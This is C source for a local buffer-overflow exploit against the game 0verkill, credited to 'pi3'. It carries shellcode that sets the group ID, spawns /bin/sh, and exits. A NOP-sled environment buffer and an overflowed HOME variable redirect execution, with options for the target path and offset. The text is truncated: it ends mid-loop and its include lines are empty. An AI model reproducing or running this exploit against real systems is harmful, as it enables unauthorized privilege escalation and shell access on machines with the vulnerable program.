/* * Simple local exploit for 0verkill by pi3 (pi3ki31ny) * Greetz: [greetz on my web] && other my friends (you know who you are) * * ...::: -=[ www.pi3.int.pl ]=- :::... */ #include #include #include #include #include //#define PATH "/root/root/all/gry/0verkill/0verkill" #define PATH "./0verkill" #define BUFS 300 /* ...::: -=[ www.pi3.int.pl ]=- :::... */ char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a" "\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d" "\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68" "\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a" "\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd" "\x80" /* setregid (20,20) */ "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" "\xcd\x80" /* exec /bin/sh */ "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd" "\x80" /* exit(0) */ "\x31\xdb\x89\xd8\xb0\x01\xcd\x80"; long ret_ad(char *a1, char *a2) { return (0xbffffffa-strlen(a1)-strlen(a2)); } int ussage(char *arg) { printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ]=- :::...\n"); printf("\n\tUssage:\n\t[+] %s [options]\n -? -o -p PATH\n\n",arg); exit(-1); } int main(int argc, char *argv[]) { long ret,*buf_addr; char *path=PATH; static char *sh[0x03]; char envp[8196],home[301]; int i,opt,offset=0; FILE *fp; while((opt = getopt(argc,argv,"p:o:?")) != -1) { switch(opt) { case 'o': offset=atoi(optarg); break; case 'p': path=optarg; break; case '?': default: ussage(argv[0]); break; } } if ( (fp=fopen(path,"r"))==NULL) { printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path); ussage(argv[0]); } fclose(fp); printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ]=- :::...\n"); printf("\n\t[+] Bulding buffors!\n"); memset(envp,0x90,sizeof(envp)); memcpy(&envp[8196-strlen(shellcode)-2], shellcode, strlen(shellcode)); envp[8195]='\0'; strcpy(home,"HOME="); buf_addr=(long*)&home[5]; for(i=0;i